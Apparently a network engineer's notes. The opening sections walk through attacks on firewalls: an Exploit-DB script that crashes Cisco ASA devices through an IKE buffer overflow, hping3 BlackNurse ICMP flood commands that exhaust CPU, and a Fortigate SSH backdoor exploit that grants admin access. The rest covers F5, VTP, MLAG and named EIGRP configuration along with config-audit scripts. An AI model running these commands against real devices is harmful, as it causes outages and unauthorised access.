Cisco ASA Software 8.x / 9.x – IKEv1 and IKEv2 Buffer Overflow

SOURCE:
RESULT:
-crashes the ASA and forces it to reboot

AFFECTED DEVICE:
Buffer overflow in the IKEv1 and IKEv2 implementations in
-Cisco ASA Software before 8.4(7.30), 8.7 before 8.7(1.18), 9.0 before 9.0(4.38), 9.1 before 9.1(7), 9.2 before 9.2(4.5), 9.3 before 9.3(3.7), 9.4 before 9.4(2.4), and 9.5 before 9.5(2.2) on ASA 5500 devices, ASA 5500-X devices
-ASA Services Module for Cisco Catalyst 6500 and Cisco 7600 devices, ASA 1000V devices
-Adaptive Security Virtual Appliance (aka ASAv), Firepower 9300 ASA Security Module, and ISA 3000

VERIFICATION:
-find open ports using Kali Linux
# nmap -v -A 10.0.10.221
open ports are 22 and 443

-download the Python script from https://www.exploit-db.com/exploits/39823/
# python 39823.py 10.0.10.221 10.0.10.103:443
10.0.10.103 is my PC's IP
443 is the port we want to attack; port 22 can be used instead

Firewall/Router Attack – BlackNurse

SOURCE: blacknurse.dk

The BlackNurse attack causes high CPU load on the target device.

REQUIREMENT:

-Kali linux

Attack (the flood variant is more effective)
# hping3 -1 -C 3 -K 3 -i u20

# hping3 -1 -C 3 -K 3 --flood

RESULTS:
-Mikrotik v6.37.1: CPU utilization 4% before the attack, 44% after
-Fortigate 5.2: CPU idle 99% before the attack, 70% after

This attack was from only 1 source. It could do more damage if I were using more attack sources.

LIST OF REPORTED AFFECTED PRODUCTS :
-Cisco ASA 5505, 5506, 5515, 5525, 5540 (default settings)
-Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface – 100% CPU load
-Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
-Cisco Router 897 – Can be mitigated – The current code from https://www.cymru.com/Documents/secure-ios-template.html will make evil worse.
-Fortinet v5.4.1 – One CPU consumed
-Fortigate units 60c and 100D (even with drop ICMP on) – RESPONSE FROM FORTINET
-Some unverified Palo Alto – SEE ANSWER FROM PALO ALTO
-Palo Alto 5050 Firewalls with firmware 7.1.4-h2
-SonicWall – Misconfiguration can be changed and mitigated (Enable Anti-DDOS)
-Zyxel NWA3560-N (Wireless attack from LAN Side)
-Zyxel Zywall USG50

NOT AFFECTED:
-AVM Fritz!Box 7360 (common ADSL router in Germany)
-Check Point Security Gateways – Checkpoint response!
-Cisco ISR4321 Router IOS XE – Version 15.5(3)S2, RELEASE SOFTWARE (fc2)
-GigaVUE HC-Serie (Gigamon)
-Iptables
-Juniper SRX
-Mikrotik CCR1036-12G-4S firmware: 3.27 (250 Mbit/s) and no problem && RouterOS 5.4 on Mikrotik RB750
-OpenBSD 6.0 and current
-pfSense
-Ubiquiti Networks – EdgeRouter Lite CPU 60-70% load but still going
-Windows Firewalls

Fortigate OS 4.x < 5.0.7 – SSH Backdoor

SOURCE: https://www.exploit-db.com/exploits/39224/

This remote exploit allows attackers to obtain administrative access via an SSH session.

Affected device:
-FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5
-FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8
-FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8

# mv 39224.py fgt_ssh_backdoor.py
# chmod 744 fgt_ssh_backdoor.py
# ./fgt_ssh_backdoor.py targetip

F5 BIG-IP – INOPERATIVE status in the bash prompt

SOURCE:
The Configuration utility indicates that the BIG-IP system is in the online (active) state, but the command line shows the inoperative status.
For example:
[root@bigip:INOPERATIVE:Standalone] config #

Workaround
To avoid this issue, you can configure BIG-IP VE with a VLAN that has the appropriate network interface attached. For more information, refer to SOL14961: Create and modify VLANs using the tmsh utility.
root@(bigip1)(cfg-sync Standalone)(INOPERATIVE)(/Common)(tmos)# create net vlan EXT interfaces add { 1.1 }
root@(bigip1)(cfg-sync Standalone)(Active)(/Common)(tmos)# create net vlan INT interfaces add { 1.2 }

Trunk between 3 switches


Say you have VLAN 10 on SW1 and SW3, and both switches have VTP in transparent mode.
Now, between SW1 and SW3, we add SW2, also in VTP transparent mode.
We need to add every VLAN that exists on SW1 and SW3 to SW2 as well,
even if those VLANs are not used on any port of SW2: a transparent-mode switch does not learn VLANs from VTP, and it will not forward tagged frames across its trunks for a VLAN it has not defined.
NOTE:
-“vlan 10” on SW2 is important; without it I can’t ping PC2 from PC1

PC1
hostname PC1
interface Ethernet0/0
ip address 10.10.10.1 255.255.255.0

SW1
hostname SW1
vtp domain POC
vtp mode transparent
vlan 10
interface Ethernet0/0
switchport access vlan 10
switchport mode access
interface Ethernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk

SW2
hostname SW2
vtp domain POC
vtp mode transparent
vlan 10
interface Ethernet0/2
switchport trunk encapsulation dot1q
switchport mode trunk
interface Ethernet0/3
switchport trunk encapsulation dot1q
switchport mode trunk

SW3
hostname SW3
vtp domain POC
vtp mode transparent
vlan 10
interface Ethernet0/0
switchport access vlan 10
switchport mode access
interface Ethernet0/3
switchport trunk encapsulation dot1q
switchport mode trunk

PC2
hostname PC2
interface Ethernet0/0
ip address 10.10.10.2 255.255.255.0
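The transit-switch requirement above is easy to miss in a larger topology, so here is an added check (example code, not from the original notes) that reads IOS-style running configs along a trunk path and reports any trunking switch missing a VLAN that some access port on the path uses. The sample configs are constructed, modelled on SW1/SW2/SW3 above, with "vlan 10" deliberately left out of SW2.

```python
import re

# Constructed sample configs modelled on the lab above; SW2 lacks "vlan 10".
SW1 = """hostname SW1
vtp mode transparent
vlan 10
interface Ethernet0/0
 switchport access vlan 10
 switchport mode access
interface Ethernet0/2
 switchport mode trunk
"""
SW3 = SW1.replace("SW1", "SW3").replace("Ethernet0/2", "Ethernet0/3")
SW2_MISSING_VLAN = """hostname SW2
vtp mode transparent
interface Ethernet0/2
 switchport mode trunk
interface Ethernet0/3
 switchport mode trunk
"""

def defined_vlans(cfg):
    """VLANs created locally with 'vlan N' or 'vlan 10,20,30-32'."""
    vlans = set()
    for m in re.finditer(r"^[ \t]*vlan ([\d,\-]+)[ \t]*$", cfg, re.M):
        for part in m.group(1).split(","):
            lo, _, hi = part.partition("-")
            vlans.update(range(int(lo), int(hi or lo) + 1))
    return vlans

def access_vlans(cfg):
    """VLANs that access ports place hosts into."""
    return {int(v) for v in
            re.findall(r"^[ \t]*switchport access vlan (\d+)[ \t]*$", cfg, re.M)}

def is_trunk_switch(cfg):
    return re.search(r"^[ \t]*switchport mode trunk[ \t]*$", cfg, re.M) is not None

def check_vlan_path(configs):
    """configs: list of (hostname, running-config text) along the trunk path.
    With VTP transparent nothing propagates the VLAN database, so every VLAN used
    by an access port on the path must be defined on every trunking switch.
    Returns {hostname: sorted missing VLAN ids} for the switches that fail."""
    needed = set().union(*(access_vlans(c) for _, c in configs))
    report = {}
    for name, cfg in configs:
        missing = needed - defined_vlans(cfg)
        if is_trunk_switch(cfg) and missing:
            report[name] = sorted(missing)
    return report
```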

Multi-Chassis Link Aggregation (MLAG)

SOURCE:
SW1
hostname SW1
vlan 30
vlan 4094
  trunk group mlagpeer
interface Port-Channel3
  switchport mode trunk
  mlag 3
interface Port-Channel4
  switchport mode trunk
  mlag 4
interface Port-Channel10
  switchport mode trunk
  switchport trunk group mlagpeer
interface Ethernet1
  channel-group 10 mode active
interface Ethernet2
  channel-group 10 mode active
interface Ethernet3
  channel-group 3 mode active
interface Ethernet4
  channel-group 4 mode active
interface Vlan4094
  no autostate
  ip address 12.0.0.1/30
mlag configuration
  domain-id mlag1
  local-interface Vlan4094
  peer-address 12.0.0.2
  peer-link Port-Channel10
end
wr

SW2
hostname SW2
vlan 30
vlan 4094
  trunk group mlagpeer
interface Port-Channel3
  switchport mode trunk
  mlag 3
interface Port-Channel4
  switchport mode trunk
  mlag 4
interface Port-Channel10
  switchport mode trunk
  switchport trunk group mlagpeer
interface Ethernet1
  channel-group 10 mode active
interface Ethernet2
  channel-group 10 mode active
interface Ethernet3
  channel-group 3 mode active
interface Ethernet4
  channel-group 4 mode active
interface Vlan4094
  no autostate
  ip address 12.0.0.2/30
mlag configuration
  domain-id mlag1
  local-interface Vlan4094
  peer-address 12.0.0.1
  peer-link Port-Channel10
end
wr

SW3
hostname SW3
no spanning-tree vlan 4094
vlan 30
interface Port-Channel3
  switchport mode trunk
interface Ethernet1
  switchport access vlan 30
interface Ethernet3
  channel-group 3 mode active
interface Ethernet4
  channel-group 3 mode active
end
wr

SW4
hostname SW4
no spanning-tree vlan 4094
vlan 30
interface Port-Channel4
  switchport mode trunk
interface Ethernet1
  switchport access vlan 30
interface Ethernet3
  channel-group 4 mode active
interface Ethernet4
  channel-group 4 mode active
end
wr

VERIFICATION
SW1#sh mlag
MLAG Configuration:
domain-id           :               mlag1
local-interface     :            Vlan4094
peer-address        :            12.0.0.2
peer-link           :      Port-Channel10
peer-config         :          consistent
MLAG Status:
state               :              Active
negotiation status  :           Connected
peer-link status    :                  Up
local-int status    :                  Up
system-id           :   52:00:00:cb:38:c2
MLAG Ports:
Disabled            :                   0
Configured          :                   0
Inactive            :                   0
Active-partial      :                   0
Active-full         :                   2

SW1# sh mlag interfaces detail
                                        local/remote
 mlag         state   local   remote    oper    config    last change   changes
------ ---------------- ------- -------- ------- ---------- -------------- -------
    3   active-full     Po3      Po3   up/up   ena/ena    0:13:09 ago         4
    4   active-full     Po4      Po4   up/up   ena/ena    0:13:09 ago         4

SW1#sh lacp sys-id detailed
System Identifier used by LACP:
System priority: 32768
Switch MAC Address: 50:00:00:d7:ee:0b
  802.11.43 representation: 8000,50-00-00-d7-ee-0b
MLAG System-identifier: 52:00:00:cb:38:c2
  802.11.43 representation: 8000,52-00-00-cb-38-c2

SW2#sh mlag
MLAG Configuration:
domain-id           :               mlag1
local-interface     :            Vlan4094
peer-address        :            12.0.0.1
peer-link           :      Port-Channel10
peer-config         :          consistent
MLAG Status:
state               :              Active
negotiation status  :           Connected
peer-link status    :                  Up
local-int status    :                  Up
system-id           :   52:00:00:cb:38:c2
MLAG Ports:
Disabled            :                   0
Configured          :                   0
Inactive            :                   0
Active-partial      :                   0
Active-full         :                   2

SW2#sh mlag interfaces detail
                                        local/remote
 mlag         state   local   remote    oper    config    last change   changes
------ ---------------- ------- -------- ------- ---------- -------------- -------
    3   active-full     Po3      Po3   up/up   ena/ena    0:14:28 ago         4
    4   active-full     Po4      Po4   up/up   ena/ena    0:14:28 ago         4

SW2#sh lacp sys-id detailed
System Identifier used by LACP:
System priority: 32768
Switch MAC Address: 50:00:00:cb:38:c2
  802.11.43 representation: 8000,50-00-00-cb-38-c2
MLAG System-identifier: 52:00:00:cb:38:c2
  802.11.43 representation: 8000,52-00-00-cb-38-c2

SW2#sh etherchannel detailed
Port Channel Port-Channel3 (Fallback State: Unconfigured):
  Active Ports:
       Port                Time became active       Protocol    Mode
    ------------------- ------------------------ -------------- ------
       Ethernet3           16:59:15                 LACP        Active
       PeerEthernet3       16:59:16                 LACP        Active
Port Channel Port-Channel4 (Fallback State: Unconfigured):
  Active Ports:
       Port                Time became active       Protocol    Mode
    ------------------- ------------------------ -------------- ------
       Ethernet4           16:59:15                 LACP        Active
       PeerEthernet4       16:59:16                 LACP        Active
Port Channel Port-Channel10 (Fallback State: Unconfigured):
  Active Ports:
       Port            Time became active       Protocol    Mode
    --------------- ------------------------ -------------- ------
       Ethernet1       16:59:06                 LACP        Active
       Ethernet2       16:59:06                 LACP        Active

Named EIGRP

SOURCE:
Since IOS version 15.2, Cisco supports Named EIGRP.

Named EIGRP is Cisco’s attempt to improve the way you configure EIGRP. With Named EIGRP, all of the EIGRP routing process parameters reside in a single, hierarchical section of the running configuration. No longer are EIGRP commands scattered throughout the running configuration. Named EIGRP also provides consistency between the IPv4 and IPv6 EIGRP commands and their parameters.

With named mode, we create a single instance of EIGRP that can be used for all address-family types, as shown above.

Another simplification is that, to turn off the entire AS, you can use the “shutdown” command under the address-family, which turns off the entire instance.
R1(config)#router eigrp HQ1
R1(config-router)#shutdown

Named EIGRP has 3 configuration modes. These are:
  1) address-family configuration mode – (config-router-af)#
  2) address-family interface configuration mode – (config-router-af-interface)#
  3) address-family topology configuration mode – (config-router-af-topology)#

A) Address-family configuration mode:
In this mode you configure networks, EIGRP neighbors, the EIGRP router-id, metrics and so on. From this mode you can access the other two configuration modes used in named EIGRP configuration.
R2(config-router)#address-family ipv4 unicast autonomous-system 1
R2(config-router-af)#?
Address Family configuration commands:
  af-interface         Enter Address Family interface configuration
  default              Set a command to its defaults
  eigrp                EIGRP Address Family specific commands
  exit-address-family  Exit Address Family configuration mode
  help                 Description of the interactive help system
  maximum-prefix       Maximum number of prefixes acceptable in aggregate
  metric               Modify metrics and parameters for address advertisement
  neighbor             Specify an IPv4 neighbor router
  network              Enable routing on an IP network
  no                   Negate a command or set its defaults
  shutdown             Shutdown address family
  timers               Adjust peering based timers
  topology             Topology configuration mode

B) Address-family interface configuration mode:

This mode takes all the interface specific commands that were previously configured on an actual interface (logical or physical) and moves them into the EIGRP configuration. EIGRP authentication, Bandwidth-percentage, split-horizon, and summary-address configuration are some of the options that are now configured here instead of in interface configuration mode.

R2(config-router-af)#af-interface fa0/0
R2(config-router-af-interface)#?
Address Family Interfaces configuration commands:
  authentication      authentication subcommands
  bandwidth-percent   Set percentage of bandwidth percentage limit
  bfd                 Enable Bidirectional Forwarding Detection
  dampening-change    Percent interface metric must change to cause update
  dampening-interval  Time in seconds to check interface metrics
  default             Set a command to its defaults
  exit-af-interface   Exit from Address Family Interface configuration mode
  hello-interval      Configures hello interval
  hold-time           Configures hold time
  next-hop-self       Configures EIGRP next-hop-self
  no                  Negate a command or set its defaults
  passive-interface   Suppress address updates on an interface
  shutdown            Disable Address-Family on interface
  split-horizon       Perform split horizon
  summary-address     Perform address summarization

In the traditional configuration, running EIGRP on all interfaces is done with the “network 0.0.0.0 0.0.0.0” command. In named mode, “af-interface default” is the counterpart: settings placed under it apply to every EIGRP interface unless a more specific af-interface section overrides them.
R2(config-router-af)#af-interface default
R2(config-router-af-interface)#

C) Address-family topology configuration mode:
This mode provides options that operate on the EIGRP topology table; here you define redistribution, distance, offset lists, variance and so on. To enter it, go back to address-family configuration mode first:
R2(config-router-af-interface)#exit
R2(config-router-af)#topology base
R2(config-router-af-topology)#?
Address Family Topology configuration commands:
  auto-summary         Enable automatic network number summarization
  default              Set a command to its defaults
  default-information  Control distribution of default information
  default-metric       Set metric of redistributed routes
  distance             Define an administrative distance
  distribute-list      Filter entries in eigrp updates
  eigrp                EIGRP specific commands
  exit-af-topology     Exit from Address Family Topology configuration mode
  fast-reroute         Configure Fast-Reroute
  maximum-paths        Forward packets over multiple paths
  metric               Modify metrics and parameters for advertisement
  no                   Negate a command or set its defaults
  offset-list          Add or subtract offset from EIGRP metrics
  redistribute         Redistribute IPv4 routes from another routing protocol
  snmp                 Modify snmp parameters
  summary-metric       Specify summary to apply metric/filtering
  timers               Adjust topology specific timers
  traffic-share        How to compute traffic share over alternate paths
  variance             Control load balancing variance

PC1:
hostname PC1
interface Ethernet0/0
 ip address 12.0.0.11 255.255.255.0

ip route 0.0.0.0 0.0.0.0 12.0.0.1

R1:
hostname R1
key chain MYCHAIN
 key 1
  key-string c1$c0
interface Loopback0
 ip address 1.0.0.1 255.255.255.255
interface Ethernet0/0
 ip address 23.0.0.1 255.255.255.0
interface Ethernet0/1
 ip address 12.0.0.1 255.255.255.0
router eigrp HQ1
 address-family ipv4 unicast autonomous-system 1
  af-interface Ethernet0/0
   authentication key-chain MYCHAIN
  exit-af-interface
  topology base
   redistribute static
  exit-af-topology
  network 1.0.0.0
  network 12.0.0.0
  network 23.0.0.0
 exit-address-family

R2:
hostname R2
key chain MYCHAIN
 key 1
  key-string c1$c0
interface Loopback0
 ip address 1.0.0.2 255.255.255.255
interface Ethernet0/0
 ip address 23.0.0.2 255.255.255.0
interface Ethernet0/1
 ip address 34.0.0.1 255.255.255.0
router eigrp HQ1
 address-family ipv4 unicast autonomous-system 1
  af-interface Ethernet0/0
   authentication key-chain MYCHAIN
  exit-af-interface
  topology base
   redistribute static
  exit-af-topology
  network 1.0.0.0
  network 23.0.0.0
  network 34.0.0.0
 exit-address-family

PC2:
hostname PC2
interface Ethernet0/0
 ip address 34.0.0.11 255.255.255.0
ip route 0.0.0.0 0.0.0.0 34.0.0.1
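The hierarchical layout of named EIGRP, together with the “af-interface default” inheritance explained earlier, makes it straightforward to audit which interfaces will peer without authentication. The following added example (not part of the original notes) walks the router eigrp block, resolves each interface's effective af-interface settings (default section first, then the interface's own, with “no X” cancelling X) and lists the non-passive interfaces that have no key chain; R1_CFG is a constructed config modelled on R1 above, where only Ethernet0/0 is authenticated.

```python
import re

# Constructed config modelled on R1 above: key chain only on Ethernet0/0.
R1_CFG = """router eigrp HQ1
 address-family ipv4 unicast autonomous-system 1
  af-interface Ethernet0/0
   authentication key-chain MYCHAIN
  exit-af-interface
  network 12.0.0.0
  network 23.0.0.0
 exit-address-family
"""

def af_interface_sections(cfg):
    """Return {af-interface name: [commands under it]} by walking the
    hierarchical router eigrp block; 'exit-af-interface' closes a section."""
    sections, current = {}, None
    for line in map(str.strip, cfg.splitlines()):
        m = re.match(r"af-interface (\S+)$", line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
        elif line == "exit-af-interface":
            current = None
        elif current is not None:
            sections[current].append(line)
    return sections

def effective_settings(cfg, ifname):
    """Commands in force on one interface: 'af-interface default' first,
    then the interface's own section; a later 'no X' cancels an earlier X."""
    sections = af_interface_sections(cfg)
    active = []
    for line in sections.get("default", []) + sections.get(ifname, []):
        if line.startswith("no "):
            active = [a for a in active if not a.startswith(line[3:])]
        else:
            active.append(line)
    return active

def unauthenticated_eigrp_interfaces(cfg, interfaces):
    """Non-passive interfaces with no 'authentication key-chain' in force,
    i.e. interfaces that would form an adjacency with any EIGRP speaker."""
    result = []
    for ifname in interfaces:
        active = effective_settings(cfg, ifname)
        if "passive-interface" not in active and not any(
                a.startswith("authentication key-chain") for a in active):
            result.append(ifname)
    return result
```

Pass the interfaces covered by the network statements; the PC-facing Ethernet0/1 comes back as unauthenticated, and adding “passive-interface” under “af-interface default” (with “no passive-interface” on Ethernet0/0) clears the report.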
VERIFICATION
PC1#ping 34.0.0.11